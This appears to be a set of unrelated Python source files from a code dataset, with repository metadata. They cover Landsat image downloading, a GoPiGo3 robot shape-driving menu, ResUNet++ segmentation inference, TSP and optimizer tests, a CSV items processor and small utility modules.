# MIT License # # Copyright (c) 2016 Patrick Eschenbach # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. 
import urllib import httplib import os import gzip import shutil import random import subprocess import json import time import math from landsat.downloader import Downloader from landsat.image import Simple from colorama import init, Fore init(autoreset=True) work_folder = "temp" def calculate_latlon_midpoint(lat1, lon1, lat2, lon2): "Calculation of geographic midpoint with method A: http://www.geomidpoint.com/calculation.html" lat1 = math.radians(lat1) lon1 = math.radians(lon1) lat2 = math.radians(lat2) lon2 = math.radians(lon2) w1 = 1 w2 = 2 w_total = w1 + w2 x1 = math.cos(lat1) * math.cos(lon1) y1 = math.cos(lat1) * math.sin(lon1) z1 = math.sin(lat1) x2 = math.cos(lat2) * math.cos(lon2) y2 = math.cos(lat2) * math.sin(lon2) z2 = math.sin(lat2) x = ((x1 * w1) + (x2 * w2)) / w_total y = ((y1 * w1) + (y2 * w2)) / w_total z = ((z1 * w1) + (z2 * w2)) / w_total hyp = math.sqrt(x * x + y * y) mid_lat = math.atan2(z, hyp) mid_lon = math.atan2(y, x) return (math.degrees(mid_lat), math.degrees(mid_lon))
37.767528
137
0.669858
# MIT License # # Copyright (c) 2016 Patrick Eschenbach # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import urllib import httplib import os import gzip import shutil import random import subprocess import json import time import math from landsat.downloader import Downloader from landsat.image import Simple from colorama import init, Fore init(autoreset=True) work_folder = "temp" def download_scene_list(): gzip_path = work_folder + "/scene_list.gz" unpack_path = work_folder + "/scene_list.csv" if os.path.isfile(unpack_path): now = time.time() last_modified = os.path.getmtime(unpack_path) interval_in_seconds = now - last_modified if interval_in_seconds < (3 * 60 * 60): print "Already downloaded list is recent enough (<3h) ..." return unpack_path print "Downloading ..." 
urllib.urlretrieve ("http://landsat-pds.s3.amazonaws.com/scene_list.gz", gzip_path) gzip_handle = gzip.open(gzip_path) with open(unpack_path, "w") as out: for line in gzip_handle: out.write(line) return unpack_path def tail_from_scene_list(file_path, num_scenes): stdin, stdout = os.popen2("tail -n " + str(num_scenes) + " " + file_path) stdin.close() lines = stdout.readlines(); stdout.close() scenes = list() for line in lines: tokens = line.split(',') scene = (tokens[0], tokens[10][:-11]) # Remove /index.hmtl\n scenes.append(scene) return scenes def parse_mtl(mtl_path): mtl = dict() groupStack = [mtl]; for line in open(mtl_path, "r"): if line.strip() == "END": break parts = line.split("=", 1) key = parts[0].strip() value = parts[1].strip() if key == "GROUP": group = dict() groupStack[-1][value] = group groupStack.append(group) elif key == "END_GROUP": groupStack.pop() else: groupStack[-1][key] = value return mtl def download_mtl(scene): mtl_path = work_folder + "/" + scene[0] + "_scene.mtl" urllib.urlretrieve (scene[1] + scene[0] + "_MTL.txt", mtl_path) return parse_mtl(mtl_path) def is_scene_suitable(scene, max_cloud_cover): mtl = download_mtl(scene) projection = mtl["L1_METADATA_FILE"]["PROJECTION_PARAMETERS"]["MAP_PROJECTION"] cloud_cover = mtl["L1_METADATA_FILE"]["IMAGE_ATTRIBUTES"]["CLOUD_COVER"] cloud_cover = float(cloud_cover) return projection == '"UTM"' and cloud_cover < max_cloud_cover def find_scene(max_cloud_cover): print Fore.GREEN + "# Downloading scene list ..." if not os.path.exists(work_folder): os.makedirs(work_folder) num_scenes = 500 file_path = download_scene_list() print "" print Fore.GREEN + "# Finding recent and suitable scene ..." scenes = tail_from_scene_list(file_path, num_scenes) for count in range(0, num_scenes): random_index = random.randint(0, num_scenes - 1) scene = scenes[random_index] if is_scene_suitable(scene, max_cloud_cover): print scene[0] print "" return scene[0] print "No suitable scene found ..." 
return "" def download_scene(scene_id): print Fore.GREEN + "# Downloading scene ..." downloader = Downloader(verbose=True, download_dir=work_folder) loaded = downloader.download([str(scene_id)], [4, 3, 2]) print "" return len(loaded) == 1 def convert_scene(scene_id, quality_in_percent, resize_in_percent): print Fore.GREEN + "# Processing scene ..." processor = Simple(work_folder + "/" + scene_id, [4, 3, 2], work_folder) processedTIF = processor.run() convertedJPG = scene_id + ".jpg" command = "convert -quality {} -resize {}% {} {}".format(str(quality_in_percent), str(resize_in_percent), processedTIF, convertedJPG) subprocess.call(command, shell=True) print "" def determine_country(lat, lon): connection = httplib.HTTPConnection("maps.googleapis.com") connection.request("GET", "/maps/api/geocode/json?latlng={},{}".format(lat, lon)) response = json.load(connection.getresponse()) if response["status"] == "OK": for result in response["results"]: if "country" in result["types"]: return result["formatted_address"] return "" def determine_countries(mtl): ll_lat = mtl["L1_METADATA_FILE"]["PRODUCT_METADATA"]["CORNER_LL_LAT_PRODUCT"] ll_lon = mtl["L1_METADATA_FILE"]["PRODUCT_METADATA"]["CORNER_LL_LON_PRODUCT"] lr_lat = mtl["L1_METADATA_FILE"]["PRODUCT_METADATA"]["CORNER_LR_LAT_PRODUCT"] lr_lon = mtl["L1_METADATA_FILE"]["PRODUCT_METADATA"]["CORNER_LR_LON_PRODUCT"] ur_lat = mtl["L1_METADATA_FILE"]["PRODUCT_METADATA"]["CORNER_UR_LAT_PRODUCT"] ur_lon = mtl["L1_METADATA_FILE"]["PRODUCT_METADATA"]["CORNER_UR_LON_PRODUCT"] ul_lat = mtl["L1_METADATA_FILE"]["PRODUCT_METADATA"]["CORNER_UL_LAT_PRODUCT"] ul_lon = mtl["L1_METADATA_FILE"]["PRODUCT_METADATA"]["CORNER_UL_LON_PRODUCT"] countries = set([determine_country(ll_lat, ll_lon), determine_country(lr_lat, lr_lon), determine_country(ur_lat, ur_lon), determine_country(ul_lat, ul_lon)]) if "" in countries: countries.remove("") return countries def calculate_latlon_midpoint(lat1, lon1, lat2, lon2): "Calculation of geographic midpoint with 
method A: http://www.geomidpoint.com/calculation.html" lat1 = math.radians(lat1) lon1 = math.radians(lon1) lat2 = math.radians(lat2) lon2 = math.radians(lon2) w1 = 1 w2 = 2 w_total = w1 + w2 x1 = math.cos(lat1) * math.cos(lon1) y1 = math.cos(lat1) * math.sin(lon1) z1 = math.sin(lat1) x2 = math.cos(lat2) * math.cos(lon2) y2 = math.cos(lat2) * math.sin(lon2) z2 = math.sin(lat2) x = ((x1 * w1) + (x2 * w2)) / w_total y = ((y1 * w1) + (y2 * w2)) / w_total z = ((z1 * w1) + (z2 * w2)) / w_total hyp = math.sqrt(x * x + y * y) mid_lat = math.atan2(z, hyp) mid_lon = math.atan2(y, x) return (math.degrees(mid_lat), math.degrees(mid_lon)) def collect_metadata(scene_id): print Fore.GREEN + "# Collecting metadata ..." mtl_path = work_folder + "/" + scene_id + "/" + scene_id + "_MTL.txt" mtl = parse_mtl(mtl_path) date = mtl["L1_METADATA_FILE"]["PRODUCT_METADATA"]["DATE_ACQUIRED"] cloud_cover = mtl["L1_METADATA_FILE"]["IMAGE_ATTRIBUTES"]["CLOUD_COVER"] ll_lat = mtl["L1_METADATA_FILE"]["PRODUCT_METADATA"]["CORNER_LL_LAT_PRODUCT"] ll_lon = mtl["L1_METADATA_FILE"]["PRODUCT_METADATA"]["CORNER_LL_LON_PRODUCT"] ur_lat = mtl["L1_METADATA_FILE"]["PRODUCT_METADATA"]["CORNER_UR_LAT_PRODUCT"] ur_lon = mtl["L1_METADATA_FILE"]["PRODUCT_METADATA"]["CORNER_UR_LON_PRODUCT"] center_latlon = calculate_latlon_midpoint(float(ll_lat), float(ll_lon), float(ur_lat), float(ur_lon)) countries = list(determine_countries(mtl)) print "Scene ID: " + scene_id print "Date acquired: " + date print "Cloud cover: " + cloud_cover print "Lower left latitude: " + ll_lat print "Lower left longitude: " + ll_lon print "Upper right latitude: " + ur_lat print "Upper right longitude: " + ur_lon print "Center latitude: " + str(center_latlon[0]) print "Center longitude: " + str(center_latlon[1]) print "Countries: " + str(countries) metadata = {} metadata["scene_id"] = scene_id metadata["date_acquired"] = date metadata["cloud_cover"] = float(cloud_cover) metadata["lower_left_lat"] = float(ll_lat) metadata["lower_left_lon"] = 
float(ll_lon) metadata["upper_right_lat"] = float(ur_lat) metadata["upper_right_lon"] = float(ur_lon) metadata["center_lat"] = center_latlon[0] metadata["center_lon"] = center_latlon[1] metadata["countries"] = countries metadataPath = scene_id + "_metadata.json" with open(metadataPath, "w") as outfile: json.dump(metadata, outfile) print "" def create_soft_links(scene_id): print Fore.GREEN + "# Creating soft links ..." lns_source_path = scene_id + ".jpg" lns_target_path = "LATEST.jpg" lns_meta_source_path = scene_id + "_metadata.json" lns_meta_target_path = "LATEST_metadata.json" try: os.remove(lns_target_path) except: pass try: os.remove(lns_meta_target_path) except: pass os.symlink(lns_source_path, lns_target_path) os.symlink(lns_meta_source_path, lns_meta_target_path) print lns_target_path print lns_meta_target_path print "" def clean_up_scene(scene_id): print Fore.GREEN + "# Cleaning up ..." clean_path = work_folder + "/" + scene_id shutil.rmtree(clean_path) print clean_path clean_mtl = work_folder + "/" + scene_id + "_scene.mtl" try: os.remove(clean_mtl) print clean_mtl except: pass try: os.rmdir(work_folder) print work_folder + "/" except: print work_folder + "/ is not empty: no action" print "" def print_scene_result(scene_id): print Fore.GREEN + "# Scene image created ..." print scene_id + ".JPG" print scene_id + "_metadata.json" print ""
7,701
0
322
a8653de9534d324f4c8a879ca13240c42270307c
3,734
py
Python
Shelby/driving_school.py
itinstructor/WNCCNASA
64896f896cfaa694f4ae7f9f62948811164d10c0
[ "CC0-1.0" ]
null
null
null
Shelby/driving_school.py
itinstructor/WNCCNASA
64896f896cfaa694f4ae7f9f62948811164d10c0
[ "CC0-1.0" ]
null
null
null
Shelby/driving_school.py
itinstructor/WNCCNASA
64896f896cfaa694f4ae7f9f62948811164d10c0
[ "CC0-1.0" ]
null
null
null
# name: driving_school.py #--------------------------------- IMPORTS -------------------------------------# import time # Import time library for sleep function import easygopigo3 as easy # Import the GoPiGo3 library gpg = easy.EasyGoPiGo3() # Create a EasyGoPiGo3 object # Initialize a distance sensor object distance_sensor = gpg.init_distance_sensor() # Initialize a servo object on Servo Port 1 servo = gpg.init_servo("SERVO1") # Set servo pointing straight ahead at 90 degrees # You may have to change the degrees to adapt to your servo # All servos line up slightly differently # Less than 90 moves the servo to the right # Greater than 90 moves the servo to the left servo.rotate_servo(90) gpg.set_speed(200) # Set initial speed AVOIDANCE_DISTANCE = 12 # Distance in inches from obstacle where the GoPiGo should stop # If a standalone program, call the main function # Else, use as a module if __name__ == '__main__': main()
37.34
135
0.630691
# name: driving_school.py #--------------------------------- IMPORTS -------------------------------------# import time # Import time library for sleep function import easygopigo3 as easy # Import the GoPiGo3 library gpg = easy.EasyGoPiGo3() # Create a EasyGoPiGo3 object # Initialize a distance sensor object distance_sensor = gpg.init_distance_sensor() # Initialize a servo object on Servo Port 1 servo = gpg.init_servo("SERVO1") # Set servo pointing straight ahead at 90 degrees # You may have to change the degrees to adapt to your servo # All servos line up slightly differently # Less than 90 moves the servo to the right # Greater than 90 moves the servo to the left servo.rotate_servo(90) gpg.set_speed(200) # Set initial speed AVOIDANCE_DISTANCE = 12 # Distance in inches from obstacle where the GoPiGo should stop def main(): #Print menu #menu method while True: print_menu_choice() menu_choice = int(input("Please pick a number from the menu: ")) if(menu_choice ==1): right_square_turn() elif(menu_choice ==2): left_square_turn() elif(menu_choice == 3): triangle_turn() elif(menu_choice == 4): octagon_turn() elif(menu_choice ==5): five_point_star() def print_menu_choice(): print("1. right square turn:") print("2. left square turn: ") print("3. triangle turn: ") print("4. octagon turn: ") print("5. 5 point star turn: ") def right_square_turn(): # Menu option 1 # need a way to start it I think for x in range(4): gpg.drive_inches(12) gpg.turn_degrees(90) def left_square_turn(): #Menu option 2 for x in range(4): # loop the things so I don't have to type that shit 4 times gpg.drive_inches(12) #go forward 12 inches gpg.turn_degrees(-90) #-90 degrees is turning left I think def triangle_turn(): # Menu option 3 for x in range(3): gpg.drive_inches(12) #go forward 12 inches gpg.turn_degrees(120) # 60 degrees is interior angle for a triangle. 
If this gives weird results, try the anterior angle of 120 def octagon_turn(): #Option 4 for x in range(8): #Loop it 8 times to complete the shape gpg.drive_inches(12) #forward 12inches gpg.turn_degrees(45) #45 degrees for each turn def five_point_star():#Option 5 #stars have like a lot of angles. for x in range (5): gpg.drive_inches(12) #12 inches gpg.turn_degrees(252) #idk if that is right maybe 72, or 108 def obstacle_avoid(): print("Press ENTER to start") input() # Wait for input to start gpg.forward() # Start moving forward, GoPiGo will continue moving forward until it receives another movement command running = True # Boolean/flag to control the while loop while running == True: # Loop while running == True dist = distance_sensor.read_inches() # Find the distance of the object in front print("Dist:", dist, 'inches') # Print feedback to the console # If the object is closer than the "distance_to_stop" distance, stop the GoPiGo if dist < AVOIDANCE_DISTANCE: print("Stopping") # Print feedback to the console gpg.stop() # Stop the GoPiGo running = False # Set running to false to break out of the loop # sleep is blocking code, nothing else can happen during sleep time.sleep(.1) # 100 milliseconds # If a standalone program, call the main function # Else, use as a module if __name__ == '__main__': main()
2,524
0
184
b634679a67b91315266daf78a009e523cc08ee09
130
py
Python
awesome_panel_extensions/developer_tools/test_apps/__init__.py
Jhsmit/awesome-panel-extensions
41eba7cf84caa911be4ed0df2a96e16fc1e70263
[ "CC-BY-4.0" ]
3
2020-07-16T07:28:45.000Z
2020-07-17T12:53:56.000Z
awesome_panel_extensions/developer_tools/test_apps/__init__.py
MarcSkovMadsen/panel-extensions-template
f41ad8d8fb8502f87de3a4992917cbffb6299012
[ "CC-BY-4.0" ]
null
null
null
awesome_panel_extensions/developer_tools/test_apps/__init__.py
MarcSkovMadsen/panel-extensions-template
f41ad8d8fb8502f87de3a4992917cbffb6299012
[ "CC-BY-4.0" ]
null
null
null
"""The PanelComponentExplorer makes it easy to explore components""" from .panel_component_explorer import PanelComponentExplorer
43.333333
68
0.853846
"""The PanelComponentExplorer makes it easy to explore components""" from .panel_component_explorer import PanelComponentExplorer
0
0
0
fe026149c752b3c212f98f38d4913e3dea8346b2
1,967
py
Python
Classes/ResUNetPlusPlus/infer.py
Nitin-Mane/ALL-PyTorch-Segmentation-2021
0f3c7b129629cc2863c502898bcfa3c45077af85
[ "MIT" ]
null
null
null
Classes/ResUNetPlusPlus/infer.py
Nitin-Mane/ALL-PyTorch-Segmentation-2021
0f3c7b129629cc2863c502898bcfa3c45077af85
[ "MIT" ]
null
null
null
Classes/ResUNetPlusPlus/infer.py
Nitin-Mane/ALL-PyTorch-Segmentation-2021
0f3c7b129629cc2863c502898bcfa3c45077af85
[ "MIT" ]
null
null
null
import os import numpy as np import cv2 from glob import glob from tqdm import tqdm import tensorflow as tf from tensorflow.keras.models import load_model from tensorflow.keras.utils import CustomObjectScope from data_generator import * from metrics import dice_coef, dice_loss if __name__ == "__main__": model_path = "../model/model/resunetplusplus.h5" save_path = "../model/result" test_path = "../model/data/" image_size = 256 batch_size = 1 test_image_paths = glob(os.path.join(test_path, "imgs", "*")) test_mask_paths = glob(os.path.join(test_path, "masks", "*")) test_image_paths.sort() test_mask_paths.sort() ## Create result folder try: os.mkdir(save_path) except: pass ## Model with CustomObjectScope({'dice_loss': dice_loss, 'dice_coef': dice_coef}): model = load_model(model_path) ## Test print("Test Result: ") test_steps = len(test_image_paths)//batch_size test_gen = DataGen(image_size, test_image_paths, test_mask_paths, batch_size=batch_size) model.evaluate_generator(test_gen, steps=test_steps, verbose=1) ## Generating the result for i, path in tqdm(enumerate(test_image_paths), total=len(test_image_paths)): image = parse_image(test_image_paths[i], image_size) mask = parse_mask(test_mask_paths[i], image_size) predict_mask = model.predict(np.expand_dims(image, axis=0))[0] predict_mask = (predict_mask > 0.5) * 255.0 sep_line = np.ones((image_size, 10, 3)) * 255 mask = mask_to_3d(mask) predict_mask = mask_to_3d(predict_mask) all_images = [image * 255, sep_line, mask * 255, sep_line, predict_mask] cv2.imwrite(f"{save_path}/{i}.png", np.concatenate(all_images, axis=1)) print("Test image generation complete")
30.261538
92
0.682766
import os import numpy as np import cv2 from glob import glob from tqdm import tqdm import tensorflow as tf from tensorflow.keras.models import load_model from tensorflow.keras.utils import CustomObjectScope from data_generator import * from metrics import dice_coef, dice_loss def mask_to_3d(mask): mask = np.squeeze(mask) mask = [mask, mask, mask] mask = np.transpose(mask, (1, 2, 0)) return mask if __name__ == "__main__": model_path = "../model/model/resunetplusplus.h5" save_path = "../model/result" test_path = "../model/data/" image_size = 256 batch_size = 1 test_image_paths = glob(os.path.join(test_path, "imgs", "*")) test_mask_paths = glob(os.path.join(test_path, "masks", "*")) test_image_paths.sort() test_mask_paths.sort() ## Create result folder try: os.mkdir(save_path) except: pass ## Model with CustomObjectScope({'dice_loss': dice_loss, 'dice_coef': dice_coef}): model = load_model(model_path) ## Test print("Test Result: ") test_steps = len(test_image_paths)//batch_size test_gen = DataGen(image_size, test_image_paths, test_mask_paths, batch_size=batch_size) model.evaluate_generator(test_gen, steps=test_steps, verbose=1) ## Generating the result for i, path in tqdm(enumerate(test_image_paths), total=len(test_image_paths)): image = parse_image(test_image_paths[i], image_size) mask = parse_mask(test_mask_paths[i], image_size) predict_mask = model.predict(np.expand_dims(image, axis=0))[0] predict_mask = (predict_mask > 0.5) * 255.0 sep_line = np.ones((image_size, 10, 3)) * 255 mask = mask_to_3d(mask) predict_mask = mask_to_3d(predict_mask) all_images = [image * 255, sep_line, mask * 255, sep_line, predict_mask] cv2.imwrite(f"{save_path}/{i}.png", np.concatenate(all_images, axis=1)) print("Test image generation complete")
115
0
23
ce6f68a12848e1fc926ef7139ad157fd2c14acc3
1,157
py
Python
tests/test_base.py
Czaki/tsp_spanning
3f0e5f338f17996c5f634824ed61282d2ea2487c
[ "MIT" ]
null
null
null
tests/test_base.py
Czaki/tsp_spanning
3f0e5f338f17996c5f634824ed61282d2ea2487c
[ "MIT" ]
null
null
null
tests/test_base.py
Czaki/tsp_spanning
3f0e5f338f17996c5f634824ed61282d2ea2487c
[ "MIT" ]
null
null
null
import unittest import numpy as np from tsp_spanning import tsp, point_tsp, points_to_distance_matrix if __name__ == "__main__": unittest.main()
32.138889
66
0.587727
import unittest import numpy as np from tsp_spanning import tsp, point_tsp, points_to_distance_matrix class TestTSP(unittest.TestCase): def test_work_point(self): points = [(0, 0), (1, 1), (-1, -1), (1, 0)] res = point_tsp(points) self.assertTrue(len(res) == 4) self.assertTrue(set(points) == set(map(tuple,res))) def test_work_point_3d(self): points = [(0, 0, 0), (1, 1, 1), (-1, -1, -1), (1, 0, 0)] res = point_tsp(points) self.assertTrue(len(res) == 4) self.assertTrue(set(points) == set(map(tuple,res))) def test_work_tsp(self): points = np.array([(0, 0), (1, 1), (-1, -1), (1, 0)]) distances = points_to_distance_matrix(points) self.assertTrue(distances.shape == (4,4)) points_order = tsp(distances) self.assertTrue(len(points_order) == 4) def test_work_tsp_end(self): points = np.array([(0, 0), (1, 1), (-1, -1), (1, 0)]) distances = points_to_distance_matrix(points) points_order = tsp(distances, 1) self.assertTrue(points_order[-1] == 1) if __name__ == "__main__": unittest.main()
858
12
134
f19d2d3c111237c6c5a7402ac82046221d1da7af
3,012
py
Python
generation-items/items-processor.py
miomao34/data-generator
89380929b42ba1f95f8e3e57c1f93ee7365a56d7
[ "MIT" ]
null
null
null
generation-items/items-processor.py
miomao34/data-generator
89380929b42ba1f95f8e3e57c1f93ee7365a56d7
[ "MIT" ]
null
null
null
generation-items/items-processor.py
miomao34/data-generator
89380929b42ba1f95f8e3e57c1f93ee7365a56d7
[ "MIT" ]
null
null
null
import json import csv from typing import Dict, List, Union def get_items_list(filename: str) -> List: """Loads items data from formatted csv files and returns the items list """ primary_title_column = 0 secondary_title_column = 1 rarity_column = 2 name_column = 3 # stats are messy and aren't applicable, so not used # stats_column = 4 description_column = 5 primary_title = '' secondary_title = '' output = [] with open(filename, 'r') as file: reader = csv.reader(file) index = 1 for row in reader: if row[primary_title_column] != '': primary_title = row[primary_title_column] secondary_title = '' continue if row[secondary_title_column] != '': secondary_title = row[secondary_title_column] continue item = {} # passed through titles, so here's data only # no EOF because reader iterates over not empty rows only if row[name_column] == '': # TODO: push error to log print(f'No name on line {index}, under {primary_title}{" - " + secondary_title if secondary_title != "" else ""}') continue if row[description_column] == '': # TODO: push error to log print(f'No description on line {index}, under {primary_title}{" - " + secondary_title if secondary_title != "" else ""}') continue item['primary_title'] = primary_title if secondary_title != '': item['secondary_title'] = secondary_title if row[rarity_column] != '': item['rarity'] = int(row[rarity_column]) item['name'] = row[name_column] item['description'] = row[description_column] print(f'Got a {item["primary_title"]} item{"" if "secondary_title" not in item else " for " + item["secondary_title"]}: {item["name"]}. 
\"{item["description"]}\"') output.append(item) index += 1 return output if __name__ == '__main__': files = [ ['generation-items/anno/csv/academy-items.csv', 'generation-items/anno/json/academy-items.json'], ['generation-items/anno/csv/ark-items.csv', 'generation-items/anno/json/ark-items.json'], ['generation-items/anno/csv/lab-items.csv', 'generation-items/anno/json/lab-items.json'], ['generation-items/anno/csv/vehicle-items.csv', 'generation-items/anno/json/vehicle-items.json'], ['generation-items/anno/csv/warehouse-items.csv', 'generation-items/anno/json/warehouse-items.json'] ] for file_pair in files: save_list_to_json( get_items_list(file_pair[0]), file_pair[1] )
34.227273
175
0.583333
import json import csv from typing import Dict, List, Union def get_items_list(filename: str) -> List: """Loads items data from formatted csv files and returns the items list """ primary_title_column = 0 secondary_title_column = 1 rarity_column = 2 name_column = 3 # stats are messy and aren't applicable, so not used # stats_column = 4 description_column = 5 primary_title = '' secondary_title = '' output = [] with open(filename, 'r') as file: reader = csv.reader(file) index = 1 for row in reader: if row[primary_title_column] != '': primary_title = row[primary_title_column] secondary_title = '' continue if row[secondary_title_column] != '': secondary_title = row[secondary_title_column] continue item = {} # passed through titles, so here's data only # no EOF because reader iterates over not empty rows only if row[name_column] == '': # TODO: push error to log print(f'No name on line {index}, under {primary_title}{" - " + secondary_title if secondary_title != "" else ""}') continue if row[description_column] == '': # TODO: push error to log print(f'No description on line {index}, under {primary_title}{" - " + secondary_title if secondary_title != "" else ""}') continue item['primary_title'] = primary_title if secondary_title != '': item['secondary_title'] = secondary_title if row[rarity_column] != '': item['rarity'] = int(row[rarity_column]) item['name'] = row[name_column] item['description'] = row[description_column] print(f'Got a {item["primary_title"]} item{"" if "secondary_title" not in item else " for " + item["secondary_title"]}: {item["name"]}. 
\"{item["description"]}\"') output.append(item) index += 1 return output def save_list_to_json(list: List, output_filename: str) -> None: with open(output_filename, 'a+') as output: json.dump(list, output) if __name__ == '__main__': files = [ ['generation-items/anno/csv/academy-items.csv', 'generation-items/anno/json/academy-items.json'], ['generation-items/anno/csv/ark-items.csv', 'generation-items/anno/json/ark-items.json'], ['generation-items/anno/csv/lab-items.csv', 'generation-items/anno/json/lab-items.json'], ['generation-items/anno/csv/vehicle-items.csv', 'generation-items/anno/json/vehicle-items.json'], ['generation-items/anno/csv/warehouse-items.csv', 'generation-items/anno/json/warehouse-items.json'] ] for file_pair in files: save_list_to_json( get_items_list(file_pair[0]), file_pair[1] )
123
0
23
786d33695c7f8f1b30e7a5ec291198dcf8be08ba
2,325
py
Python
tests/opytimizer/optimizers/science/test_efo.py
anukaal/opytimizer
5f1ccc0da80e6a4cabd99578fa24cf4f6466f9b9
[ "Apache-2.0" ]
528
2018-10-01T20:00:09.000Z
2022-03-27T11:15:31.000Z
tests/opytimizer/optimizers/science/test_efo.py
anukaal/opytimizer
5f1ccc0da80e6a4cabd99578fa24cf4f6466f9b9
[ "Apache-2.0" ]
17
2019-10-30T00:47:03.000Z
2022-03-21T11:39:28.000Z
tests/opytimizer/optimizers/science/test_efo.py
anukaal/opytimizer
5f1ccc0da80e6a4cabd99578fa24cf4f6466f9b9
[ "Apache-2.0" ]
35
2018-10-01T20:03:23.000Z
2022-03-20T03:54:15.000Z
import numpy as np from opytimizer.optimizers.science import efo from opytimizer.spaces import search np.random.seed(0)
18.164063
79
0.569462
import numpy as np from opytimizer.optimizers.science import efo from opytimizer.spaces import search np.random.seed(0) def test_efo_params(): params = { 'positive_field': 0.1, 'negative_field': 0.5, 'ps_ratio': 0.1, 'r_ratio': 0.4 } new_efo = efo.EFO(params=params) assert new_efo.positive_field == 0.1 assert new_efo.negative_field == 0.5 assert new_efo.ps_ratio == 0.1 assert new_efo.r_ratio == 0.4 assert new_efo.phi == (1 + np.sqrt(5)) / 2 assert new_efo.RI == 0 def test_efo_params_setter(): new_efo = efo.EFO() try: new_efo.positive_field = 'a' except: new_efo.positive_field = 0.5 try: new_efo.positive_field = -1 except: new_efo.positive_field = 0.5 assert new_efo.positive_field == 0.5 try: new_efo.negative_field = 'b' except: new_efo.negative_field = 0.2 try: new_efo.negative_field = 0.99 except: new_efo.negative_field = 0.2 try: new_efo.negative_field = -1 except: new_efo.negative_field = 0.2 assert new_efo.negative_field == 0.2 try: new_efo.ps_ratio = 'c' except: new_efo.ps_ratio = 0.25 try: new_efo.ps_ratio = -1 except: new_efo.ps_ratio = 0.25 assert new_efo.ps_ratio == 0.25 try: new_efo.r_ratio = 'd' except: new_efo.r_ratio = 0.25 try: new_efo.r_ratio = -1 except: new_efo.r_ratio = 0.25 assert new_efo.r_ratio == 0.25 try: new_efo.phi = 'e' except: new_efo.phi = (1 + np.sqrt(5)) / 2 assert new_efo.phi == (1 + np.sqrt(5)) / 2 try: new_efo.RI = 'f' except: new_efo.RI = 0 try: new_efo.RI = -1 except: new_efo.RI = 0 assert new_efo.RI == 0 def test_efo_calculate_indexes(): new_efo = efo.EFO() a, b, c = new_efo._calculate_indexes(30) assert a >= 0 assert b >= 0 assert c >= 0 def test_efo_update(): def square(x): return np.sum(x**2) new_efo = efo.EFO() search_space = search.SearchSpace(n_agents=2, n_variables=2, lower_bound=[1, 1], upper_bound=[10, 10]) new_efo.update(search_space, square)
2,107
0
92
22af80f58a32481092f7cbbec89e46075559aa22
783
py
Python
src/jams/task.py
saromanov/jams
76b95b373cc41466c0d397c8c5681a02b0345e16
[ "MIT" ]
null
null
null
src/jams/task.py
saromanov/jams
76b95b373cc41466c0d397c8c5681a02b0345e16
[ "MIT" ]
3
2019-01-03T19:41:01.000Z
2019-01-31T13:14:26.000Z
src/jams/task.py
saromanov/jams
76b95b373cc41466c0d397c8c5681a02b0345e16
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- """ james.task ~~~~~~~~~~~~~ Implementation of the task. Task this is action which contains checking. It should contains rule, weight """
22.371429
66
0.58493
# -*- coding: utf-8 -*- """ james.task ~~~~~~~~~~~~~ Implementation of the task. Task this is action which contains checking. It should contains rule, weight """ class TaskBase: def __init__(self, name, *args, **kwargs): self._name = name def __str__(self): return self._name def __getattr__(self, name): return '{0} call'.format(name) def do(self): raise NotImplementedError def weight(self): """return weight of the task in the case if task was completed """ return 0 class Task(TaskBase): def __init__(self, name, *args, **kwargs): self._weight = kwargs.get('weight') self._action = kwargs.get('action') super().__init__(name, *args, **kwargs)
299
232
72
2d15005c1f91448fffe8337592d219ad885c8d0d
964
py
Python
baloney/__main__.py
tonybaloney/baloney-script
24b1158634e473d48f14d23c9f66a049bdcce6f9
[ "MIT" ]
null
null
null
baloney/__main__.py
tonybaloney/baloney-script
24b1158634e473d48f14d23c9f66a049bdcce6f9
[ "MIT" ]
null
null
null
baloney/__main__.py
tonybaloney/baloney-script
24b1158634e473d48f14d23c9f66a049bdcce6f9
[ "MIT" ]
null
null
null
import argparse import baloney.parser as baloney_parser from baloney.interpreter import BaloneyInterpreter parser = argparse.ArgumentParser() parser.add_argument('--lex', type=bool) parser.add_argument("file", type=str, help="Target .bs file") if __name__ == '__main__': args = parser.parse_args() main(args)
25.368421
54
0.61722
